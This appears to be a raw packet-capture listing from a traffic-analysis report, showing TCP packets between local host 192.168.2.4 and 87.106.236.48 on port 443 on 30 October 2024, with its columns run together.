                                                                                              Oct 30, 2024 19:47:19.327331066 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.327339888 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.327398062 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.328114986 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.328129053 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.328188896 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.328197002 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.328237057 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.328543901 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.328560114 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.328608990 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.328615904 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.328655005 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.328964949 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.328979969 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.329025030 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.329030991 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.329078913 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.332000017 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.332015991 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.332086086 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.332093000 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.332130909 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.332556963 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.332572937 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.332623959 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.332629919 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.332665920 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.332775116 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.332792997 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.332823992 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.332830906 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.332856894 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.332869053 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.333045959 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.333061934 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.333096027 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.333102942 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.333127022 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.333146095 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.333386898 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.333401918 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.333445072 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.333450079 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.333486080 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.333688974 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.333703995 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.333739996 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.333745003 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.333766937 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.333782911 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.334038019 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.334053993 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.334086895 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.334094048 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.334115028 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.334132910 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.334367990 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.334384918 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.334433079 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.334439993 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.334482908 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.334708929 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.334722996 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.334759951 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.334765911 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.334790945 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.334800005 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.335058928 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.335074902 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.335108995 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.335114002 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.335150957 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.335164070 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.335403919 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.335421085 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.335481882 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.335525036 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.335530043 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.335664988 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.335766077 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.335782051 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.335817099 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.335824013 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.335851908 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.335870981 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.339061975 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.339077950 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.339133024 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.339140892 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.339169025 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.339179993 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.339402914 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.339417934 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.339453936 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.339462042 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.339478970 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.339502096 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.339708090 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.339720964 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.339777946 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.339783907 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.339807034 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.339826107 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.369350910 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.369371891 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.369436979 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.369446993 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.369486094 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.370131016 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.370146990 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.370182991 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.370196104 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.370212078 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.370230913 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.413503885 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.413518906 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.413584948 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.413595915 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.413635015 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.451278925 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.451296091 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.451473951 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.451498032 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.451550007 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.453000069 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.453013897 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.453068972 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.453077078 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.453119040 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.453319073 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.453332901 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.453383923 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.453394890 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.453435898 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.454684019 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.454699993 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.454754114 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.454761028 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.454794884 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.455049992 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.455064058 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.455111980 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.455118895 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.455164909 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.455674887 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.455691099 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.455741882 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.455748081 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.455789089 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.456031084 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.456047058 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.456096888 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.456104040 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.456146002 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.457037926 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.457053900 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.457107067 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.457113981 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.457150936 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.457343102 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.457364082 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.457398891 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.457406044 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.457428932 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.457442045 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.457715988 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.457731009 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.457777023 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.457784891 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.457825899 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.458067894 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.458084106 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.458136082 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.458143950 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.458180904 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.458349943 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.458364964 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.458410025 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.458416939 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.458457947 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.458641052 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.458657980 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.458700895 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.458708048 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.458748102 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.459081888 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.459095955 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.459151030 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.459157944 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.459196091 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.459332943 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.459347010 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.459397078 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.459403038 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.459443092 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.459702015 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.459717989 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.459762096 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.459768057 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.459810019 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.463917017 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.463932037 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.463984966 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.463992119 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.464034081 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.464063883 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.464081049 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.464128971 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.464135885 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.464176893 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.464190960 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.464205980 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.464241028 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.464246988 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.464268923 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.464288950 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.464329958 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.464344978 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.464395046 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.464401960 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.464445114 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.493016005 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.493053913 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.493205070 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.493205070 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.493218899 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.493516922 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.493544102 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.493557930 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.493614912 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.493623018 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.493663073 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.573036909 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.573060989 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.573236942 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.573263884 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.573313951 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.576095104 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.576107979 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.576165915 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.576174021 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.576215982 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.576494932 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.576508999 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.576560974 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.576567888 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.576607943 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.576834917 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.576848030 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.576900005 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.576906919 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.576945066 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.578110933 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.578125000 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.578178883 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.578186035 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.578223944 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.578586102 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.578603029 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.578659058 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.578665972 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.578702927 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.578943968 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.578957081 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.579003096 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.579010963 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.579044104 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.579193115 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.579206944 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.579272985 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.579281092 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.579319954 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.580176115 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.580192089 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.580244064 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.580250025 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.580286026 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.580518007 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.580530882 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.580579042 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.580585003 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.580630064 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.581033945 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.581049919 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.581105947 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.581114054 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.581150055 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.581454992 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.581468105 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.581516027 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.581521988 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.581548929 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.581567049 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.582079887 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.582093000 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.582150936 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.582159042 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.582195044 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.582385063 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.582400084 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.582444906 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.582452059 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.582489014 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.582797050 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.582809925 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.582859993 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.582868099 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.582914114 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.583029032 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.583045959 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.583096981 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.583102942 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.583139896 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.583468914 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.583484888 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.583528042 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.583534002 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.583559036 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.583575010 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.583692074 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.583705902 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.583739042 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.583745956 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.583769083 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.583786964 CET49731443192.168.2.487.106.236.48
                                                                                              Oct 30, 2024 19:47:19.585391998 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.585407019 CET4434973187.106.236.48192.168.2.4
                                                                                              Oct 30, 2024 19:47:19.585467100 CET49731443192.168.2.487.106.236.48
